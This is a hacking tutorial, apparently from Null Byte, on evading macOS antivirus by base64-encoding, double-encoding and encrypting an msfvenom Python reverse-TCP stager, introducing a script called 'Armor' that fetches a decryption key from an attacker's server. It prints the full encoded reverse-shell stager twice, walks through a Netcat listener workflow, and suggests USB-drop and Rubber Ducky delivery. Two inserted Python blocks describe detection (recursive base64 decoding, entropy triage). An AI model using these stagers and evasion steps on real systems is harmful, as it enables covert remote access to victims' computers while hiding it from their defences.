How To Create An Undetectable Payload « Null Byte :: WonderHowTo

Encrypting payloads and encoding stagers are more effective against macOS than you might think. In addition, it is very easy to evade VirusTotal and macOS antivirus programs with a few simple tricks.

The objective of this project was to take a well-known and easily detectable macOS payload and find a method that allowed the same payload to run on the target MacBook. This would reliably confirm whether any evasion method discovered was effective with known payloads. In addition to testing the malicious files against VirusTotal, they were tested on macOS Mojave (v10.14) against popular antivirus programs such as Avast, AVG, BitDefender, Sophos and ClamXAV.

Readers should not confuse this topic with circumventing Gatekeeper or System Integrity Protection (SIP). Running an unsigned application and evading virus scanners are two different topics. The focus of this article is evading detection by antivirus software and VirusTotal. As we will see below, in most cases merely encoding a payload is enough to evade antivirus detection.

echo "one two three" | base64
IHR3byB0aHJlZQo=
echo "one two three four" | base64
b25lIHR3byB0aHJlZSBmb3VyCg==
echo "one two three four five" | base64
All of these strings can be easily decoded (-d on Kali, -D on macOS) with the command below.

base64 -d <<< 'b25lIHR3byB0aHJlZSBmb3VyIGZpdmUK'

Notice that the end of each string changes subtly while the beginning always stays the same. The same goes for most payloads. If only the IP address and port number change, the beginning of the resulting base64-encoded payload will be the same for every hacker and pentester using msfvenom. Below is an example generated by msfvenom with the IP address "10.42.0.1".

aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEwLjQyLjAuMScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=

The msfvenom output below uses the same payload but with a different IP address, "192.168.0.2".

aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMC4yJyw0NDQ0KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyhkLHsncyc6c30pCg==

No matter which IP address and port are used, the first 142 characters are always identical with this msfvenom payload. Even without decoding the strings and analyzing them for malicious code, one would at least expect antivirus programs to flag such common base64 strings, but they do not.

Saving this decoded Python code to a file named "thisfileisevil_without_encoding.py" and uploading it to VirusTotal resulted in the following 1/56 detection rate.

Interestingly, the raw Python code got an even lower detection rate.

At this point it is unclear exactly what VirusTotal and antivirus programs are trying to detect. They do not do a good job of decoding base64 strings or of flagging the 13 lines of Python generated by msfvenom, which has undoubtedly been used thousands of times by pentesters and hackers over the years.

Double Base64 Encoded Payloads

If a simply encoded payload is able to evade most antivirus programs, double-encoding it should be an effective technique too, right? Well, not really. Encoding the already encoded msfvenom output and uploading it to VirusTotal resulted in the following 1/54 detection.

Again, the single 1/54 detection came from Microsoft, which does not help macOS users with antivirus software at all. This was achieved by first encoding the msfvenom output (the same payload shown above) and then encoding the result a second time.

Here, printf and base64 are used on the MacBook to decode (-D) the string and immediately execute the result as a command (-c) with Python, which in turn decodes the inner payload and creates the reverse TCP connection.

To my surprise, both VirusTotal and the popular antivirus programs were evaded this way. None of the tested antivirus programs could detect a double-encoded payload, whether in the form of a text file or an AppleScript.
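The two passages above make a testable claim: the encoded stager carries a fixed prefix, yet scanners neither decode the base64 nor flag it, and even a second layer of encoding goes unnoticed. As an added example (not part of the original article, msfvenom or Armor), the Python below implements the check a scanner could run: it pulls base64-looking tokens out of text, strictly decodes them, recurses to catch double encoding, and matches each decoded layer against plaintext fragments of the msfvenom stager decoded from this page's own base64 string. The stager string is the one shown above with the IP "10.42.0.1"; the carrier text, the double-encoded variant and the benign control inside demo() are constructed test input.

```python
import base64
import binascii
import re

# The msfvenom python reverse_tcp stager exactly as shown on this page (IP 10.42.0.1).
PAGE_STAGER_B64 = (
    "aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1z"
    "b2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEwLjQyLjAu"
    "MScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFj"
    "aygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJl"
    "Y3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo="
)

# Signatures are substrings of the decoded stager, so they match no matter which
# IP or port was baked in (only the base64 after the connect() call changes).
STAGER_SIGNATURES = (
    "import socket,struct,time",
    "s=socket.socket(2,socket.SOCK_STREAM)",
    "exec(d,{'s':s})",
)

# Candidate tokens: a long run of base64 alphabet with optional '=' padding.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def _try_decode(token: str):
    """Strictly decode one token; None if it is not valid base64 or not text."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        return None


def scan_text(text: str, max_depth: int = 4) -> list:
    """Recursively decode base64 blobs in text and report stager signatures.

    Returns a list of (depth, signature) tuples; depth 1 means the signature was
    found after one decode, depth 2 after decoding a double-encoded blob, etc."""
    findings = []

    def walk(layer: str, depth: int) -> None:
        for sig in STAGER_SIGNATURES:
            if sig in layer:
                findings.append((depth, sig))
        if depth >= max_depth:
            return
        for token in B64_TOKEN.findall(layer):
            inner = _try_decode(token)
            if inner is not None:
                walk(inner, depth + 1)

    walk(text, 0)
    return findings


def double_encode(blob: str) -> str:
    """Base64-encode an already base64-encoded string (the double encoding above)."""
    return base64.b64encode(blob.encode("ascii")).decode("ascii")


def demo() -> dict:
    """Constructed carriers: the page's stager in a text file, the same string
    encoded a second time, and a benign base64 control that must not match."""
    single_layer = "payload = '" + PAGE_STAGER_B64 + "'\n"
    double_layer = "payload = '" + double_encode(PAGE_STAGER_B64) + "'\n"
    benign = base64.b64encode(b"one two three four five\n").decode("ascii")
    return {
        "single": scan_text(single_layer),
        "double": scan_text(double_layer),
        "benign": scan_text(benign),
    }


if __name__ == "__main__":
    for name, hits in demo().items():
        print(name, hits)
```

The recursion is what separates this from the behaviour the article observed: a scanner that decodes only once still sees the double-encoded blob as harmless base64, while decoding until no further valid base64 remains surfaces the same plaintext fragments at depth 2. Bounding the depth keeps a deliberately nested or self-referential blob from turning the check into a denial of service.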

Encrypted payload

So far we have learned that encoding and double-encoding a payload will evade detection by most antivirus programs (even though raw code does even better). Nevertheless, encoding scripts and payloads is a cat-and-mouse game between hackers and antivirus developers. It is only a matter of time before someone at AVG or Avast discovers this Null Byte article and antivirus scanners start recursively decoding base64 strings and looking for common encoded signatures.

This got me thinking about a more reliable method of defeating macOS antivirus, a solution that is a bit more difficult to detect and prevent. Encrypting the payload, in addition to encoding it, provides a better way to evade antivirus scanners.

Why is encryption better than encoding?

The primary drawback of encoding is that an antivirus program could recursively decode base64 strings and easily detect the embedded payload. No matter how many times an attacker encodes his payload, it can be reversed. With an encrypted payload, all the antivirus program will ever find is a series of unreadable bytes. The encrypted payload cannot be scanned by AV software or read by people, not without knowing the decryption key.
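To make the encoding-versus-encryption contrast concrete from the scanner's side, here is an added Python example that is not part of the original article or of the Armor script. It takes a base64 blob found in a file or command line, strictly decodes it, and triages the result: decodable printable text (worth recursing into and signature-scanning) versus a high-entropy byte blob (encrypted or compressed, so content scanning is pointless and the surrounding context, such as where a key was fetched from and what executed next, is what a defender should record). The SHA-256 counter-mode XOR cipher and the sample script are my constructions so that realistic ciphertext can be produced offline; Armor's actual LibreSSL-based scheme is not reproduced.

```python
import base64
import binascii
import hashlib
import math
from collections import Counter

# Constructed stand-in for "the payload": a harmless directory-listing script,
# repeated to give the entropy estimate enough bytes to work with.
SAMPLE_SCRIPT = (
    "import os\n"
    "for name in sorted(os.listdir('.')):\n"
    "    path = os.path.join('.', name)\n"
    "    print(name, os.path.getsize(path))\n"
) * 8


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte of the empirical byte distribution (0..8)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def keystream_xor(data: bytes, key: bytes) -> bytes:
    """Toy stream cipher for illustration only (not Armor's LibreSSL scheme):
    XOR the data with a SHA-256 counter-mode keystream. It is symmetric, so
    applying it twice with the same key returns the plaintext."""
    stream = bytearray()
    counter = 0
    while len(stream) < len(data):
        stream += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))


def classify_blob(token: str, text_max_entropy: float = 6.0) -> str:
    """Triage one base64 token found in a file or command line.

    'not-base64'   : fails strict decoding, nothing to decode
    'text'         : printable, low-entropy content; recurse and signature-scan it
    'high-entropy' : opaque bytes, likely encrypted or compressed; static content
                     scanning cannot help, so inspect the context instead
    """
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return "not-base64"
    printable = all(32 <= b < 127 or b in (9, 10, 13) for b in raw)
    if printable and shannon_entropy(raw) < text_max_entropy:
        return "text"
    return "high-entropy"


def demo() -> dict:
    """Encode the sample script plainly and after encryption; classify both."""
    plain = SAMPLE_SCRIPT.encode("ascii")
    key = hashlib.sha256(b"constructed one-time key").digest()  # illustrative key
    cipher = keystream_xor(plain, key)
    encoded_plain = base64.b64encode(plain).decode("ascii")
    encoded_cipher = base64.b64encode(cipher).decode("ascii")
    return {
        "plain_entropy": shannon_entropy(plain),
        "cipher_entropy": shannon_entropy(cipher),
        "plain_class": classify_blob(encoded_plain),
        "cipher_class": classify_blob(encoded_cipher),
        "roundtrip_ok": keystream_xor(cipher, key) == plain,
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Source text decodes to printable bytes with well under six bits of entropy per byte; the same bytes after encryption look like uniform random data, and no amount of further decoding will change that. That is the article's point restated as a measurement, and it also shows where detection has to move once static content is opaque: to the key retrieval and the decrypt-and-execute step that must still happen on the target.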

That brings me to Armor, a simple shell script I created to illustrate how encrypting a macOS payload can be automated and executed.

How the "Armor" Script Works

Armor encrypts the contents of whatever file it is given. The file can contain a simple one-liner, a complex Python script with hundreds of lines of code, or a post-exploitation script written in any programming language supported by macOS. The file contents are encrypted with a one-time key. The key is then temporarily hosted on the attacker's server and fetched by the target MacBook to decrypt the payload.

There are a few things happening in this GIF. I'll explain each step in order.

A Netcat listener is started on port 4444. The file "payload.txt" is read and shown to contain a simple Bash one-liner that, when run, will create a TCP connection from the target MacBook to the attacker's Netcat listener. Armor is used to encrypt the Bash one-liner. Ncat is used to host the decryption key on the attacker's server. When the stager runs on the target MacBook (not shown in the GIF), it decrypts and runs the Bash one-liner without writing any data to the hard drive. Ncat terminates the listener immediately after the key has been used. Once the Netcat connection is established, the attacker has remote access to the target MacBook.

For a technical explanation of what the script does and how it executes commands without writing data to the target's hard drive, head over to my GitHub page and read the comments. Readers interested in giving Armor a quick test run can follow the steps below.

Step 1: Install Armor

Armor can be found on my GitHub page and cloned with the command below.

The address 1.2.3.4 is the attacker's IP address where the decryption key will be hosted. This can be a local IP (for example "192.168.1.2") or a virtual private server address. The Ncat server uses this address and port number (443) to host the decryption key. Port 443 can be any available port on the attacker's Kali Linux system.

If LibreSSL (the version of OpenSSL used by macOS) is not found on Kali, Armor will try to install it. Unfortunately, the version of OpenSSL shipped with Kali/Debian is not compatible with macOS's LibreSSL.

Step 4: Start Ncat Listener

Before proceeding, start the Ncat listener. Armor tries to start it automatically.

Step 5: Run the Stager

Armor will produce an encoded and encrypted command intended for the target MacBook. This stager could be embedded in an AppleScript for USB drop attacks, used in USB Rubber Ducky attacks, or employed in other social engineering attacks. For now, we'll just copy and paste the stager into a MacBook terminal.

When the stager runs, the MacBook terminal will list (ls) all (-a)

We've encrypted a single ls command, but imagine the possibilities when applying the same degree of obfuscation to a sophisticated Python script designed to carry out a series of advanced attacks. Antivirus software currently does not decode base64 strings, and even if it did, the embedded, encrypted payload could not be read.

Improving the Attack

Armor is not perfect. It is a bit of a proof of concept that readers will hopefully find ways to improve. An alternative to LibreSSL, for example, would be welcome: because most Debian and Kali distros do not have it installed by default, it is a bit awkward as an encryption solution.

Hosting the decryption key on the attacker's server is risky. If the attacker's IP address is discovered in the stager, it may be possible to work out the key's filename and download it. The key would allow the target to decrypt the payload and learn what kind of exploitation was performed on the MacBook.

In addition, a way of encrypting payloads that does not depend on the target being connected to the Internet (to download the decryption key) would be more effective.

Final Thoughts

After testing these attacks against VirusTotal and at least six popular antivirus programs, none could detect a double-encoded payload. macOS antivirus scanners barely seem to identify even the most common encoded payloads. Detecting something created by Armor will prove much more challenging for today's macOS antivirus scanners.

In addition, macOS relies too heavily on Gatekeeper to prevent malware from being opened. As shown in an earlier article, Gatekeeper protection is not applied to USB devices inserted into the MacBook, so targets can be socially engineered into opening malicious files.

To proactively prevent such attacks, readers should check out "How to Protect yourself from MacOS Attacks."